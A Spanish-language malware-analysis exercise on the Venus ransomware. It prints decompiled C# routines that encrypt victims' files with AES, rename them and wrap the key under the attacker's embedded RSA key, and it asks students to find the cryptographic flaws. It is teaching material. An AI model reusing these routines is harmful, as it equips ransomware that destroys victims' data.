# Ejemplo de Ransomware

Vamos a ver el código de un ransomware llamado Venus. El ransomware en sí no es demasiado peligroso (el ejercicio en sí es ver por qué y en qué falla) pero fue un ransomware real

Ten cuenta:

- **El malware que estudiaremos hoy es real. No lo descargues en tu ordenador, no lo ejecutes en tu ordenador. Usa siempre una máquina virtual. Para este ejercicio no es necesario descargar ni desemsamblar el malware, ya lo he hecho yo por vosotros**
- "ANY Run" es un servicio de máquinas virtuales para ejecutar malware y ver qué hace. Este ransomware Venus puedes encontrarlo aquí: https://app.any.run/tasks/5f7f7b45-bdf8-441e-bbe2-3ef2553214d0/
- Una vez descargado, este ransomware en particular está escrito en .NET y puede decompilarse con dnspy: https://github.com/dnSpy/dnSpy

**El malware es real. No lo descargue en tu ordenador, no lo ejecutes en tu ordenador. Usa siempre una máquina virtual. Para este ejercicio no es necesario descargar ni desemsamblar el malware, ya lo he hecho yo por vosotros**

A continuación solo presento las funciones más importantes de este ransomware. El resto del código incluye una lista de extensiones filtradas, código para dejar la nota de rescate y detalles similares.

## Función principal del malware

Es común que el ransomware envíe la clave de descifrado (pwd) a su creador. Fíjate que esta clave no se guarda nunca en el disco de la víctima.

Ejercicio: ¿puedes interpretar qué hace este código?

Información adicional

- SendInfo() y SendKey() son funciones sencillas sencilla para enviar datos a un servidor controlado por el atacante. Si no pueden contactar con el servidor, estas funciones devuelven el número "1". Si sí que puden contactar, devuelvel el número "0". ¿Qué pasa si el servidor del atacante no está disponible? ¿Se interrumpe la ejecución?
- Fíjate que la clave pública del atacante se incluye en la función AESKeyEncryptWithRSA()
- this.Disk_Encryption(pwd) inicia el cifrado. Para todos los discos, y para todos los archivos en esos discos que tengan una extensión determinada, llama a las funciones que veremos en la siguiente sección

```c
// Token: 0x06000005 RID: 5 RVA: 0x00003C44 File Offset: 0x00001E44
public int VenusLockerRun()
{
    DateTime now = DateTime.Now;
    DateTime t = Convert.ToDateTime("2017-09-30 00:00:00");
    if (DateTime.Compare(now, t) > 0)
    {
        return -1;
    }
    ServicePointManager.ServerCertificateValidationCallback = (RemoteCertificateValidationCallback)Delegate.Combine(ServicePointManager.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback(MainForm.ValidateRemoteCertificate));
    string text;
    int num = this.SendInfo(out text);
    this.PersonalID = text;
    string pwd;
    if (num == 0)
    {
        pwd = this.CreatePassword(32);
    }
    else
    {
        pwd = "BGORMkj&v=u1X0O2hOybNdRvZb9SGGnm";
    }
    this.Disk_Encryption(pwd);
    if (num == 0)
    {
        string aeskey = this.AESKeyEncryptWithRSA(pwd);
        this.SendKey(text, aeskey);
    }
    return 0;
}
```

```cpp
// Token: 0x0600000E RID: 14 RVA: 0x0000446C File Offset: 0x0000266C
public string AESKeyEncryptWithRSA(string pwd)
{
    RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider(2048);
    rsacryptoServiceProvider.FromXmlString("<RSAKeyValue><Modulus>33h27lNoiA3zNWAsHEGmprf6ztXszThFMSmvh3QFh72trcyHyBZT9XccFtVcUxqH2yGW1Ary7vgjmEmkZqtYfU8S/lVOD7DxKVJlqqIxJjuVuJo0QHowCyUv0FJVQuPv7XcZAaOuuBoubgMAXv6H5J8EQ0Sw7SU7QsuZyqZv0tAXxVan1dXXa8MAjsw0d4BeZ2RAmj0hmZQI85yGyOykvggKw+ut6gL2kRGPmZnIP/Ydhnvvwnv/WFi1cymMcQsJsJ2NdWSH7oRkECoxFnxpqIcKcVxVTCXQRj2uXiiWMRGpJp0vP2uO1E7qhx64/2rAp6R5TacakBpps0OKZpu8jw==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>");
    byte[] bytes = Encoding.UTF8.GetBytes(pwd);
    byte[] inArray = rsacryptoServiceProvider.Encrypt(bytes, true);
    return Convert.ToBase64String(inArray);
}
```

## Funciones de cifrado

A continuación están las funciones utilizadas para el cifrado un archivo. La función Disk_Encryption() de arriba acaba seleccionando archivos y llamando a File_Encryiption(). No todos los archivos se cifran, solo los que tienen determinadas extensiones (office, por ejemplo, sí que se cifra)

Ejercicios:

- ¿Qué algoritmo se usa para cifrar?
- ¿En qué modo?
- ¿Cómo se crea la clave de cifrado?
- ¿De dónde sale el IV? ¿Crees que es buena práctica?
- Imagina que contactas con el atacante y le pagas lo que pida por la clave. El atacante te devuelve una clave. ¿Crees que podrás recuperarás tus archivos?

```cpp
// Token: 0x0600000C RID: 12 RVA: 0x000041E0 File Offset: 0x000023E0
public int File_Encryption(string pwd, FileInfo file)
{
    byte[] array = Encoding.UTF8.GetBytes(pwd);
    array = SHA256.Create().ComputeHash(array);
    try
    {
        if (this.FullCryptExtension.Contains(file.Extension))
        {
            byte[] bytesToBeEncrypted = File.ReadAllBytes(file.FullName);
            byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array, true);
            File.WriteAllBytes(file.FullName, bytes);
            byte[] bytes2 = Encoding.Default.GetBytes(file.Name);
            File.Move(file.FullName, file.FullName.Substring(0, file.FullName.Length - file.Name.Length) + Convert.ToBase64String(bytes2) + ".Venusf");
        }
        else
        {
            FileStream fileStream = new FileStream(file.FullName, FileMode.Open, FileAccess.ReadWrite);
            byte[] array2 = new byte[1024];
            fileStream.Read(array2, 0, 1024);
            byte[] buffer = this.AES_Encrypt(array2, array, false);
            fileStream.Seek(0L, SeekOrigin.Begin);
            fileStream.Write(buffer, 0, 1024);
            fileStream.Close();
            byte[] bytes3 = Encoding.Default.GetBytes(file.Name);
            File.Move(file.FullName, file.FullName.Substring(0, file.FullName.Length - file.Name.Length) + Convert.ToBase64String(bytes3) + ".Venusp");
        }
    }
    catch
    {
        return -1;
    }
    return 0;
}
```

```cpp
// Token: 0x0600000D RID: 13 RVA: 0x00004368 File Offset: 0x00002568
public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes, bool isPadding)
{
    byte[] result = null;
    byte[] salt = new byte[]
    {
        1,
        2,
        3,
        4,
        5,
        6,
        7,
        8
    };
    using (MemoryStream memoryStream = new MemoryStream())
    {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            rijndaelManaged.KeySize = 256;
            rijndaelManaged.BlockSize = 128;
            Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
            rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
            rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
            rijndaelManaged.Mode = CipherMode.CBC;
            if (!isPadding)
            {
                rijndaelManaged.Padding = PaddingMode.None;
            }
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
            {
                cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                cryptoStream.Close();
            }
            result = memoryStream.ToArray();
        }
    }
    return result;
}
```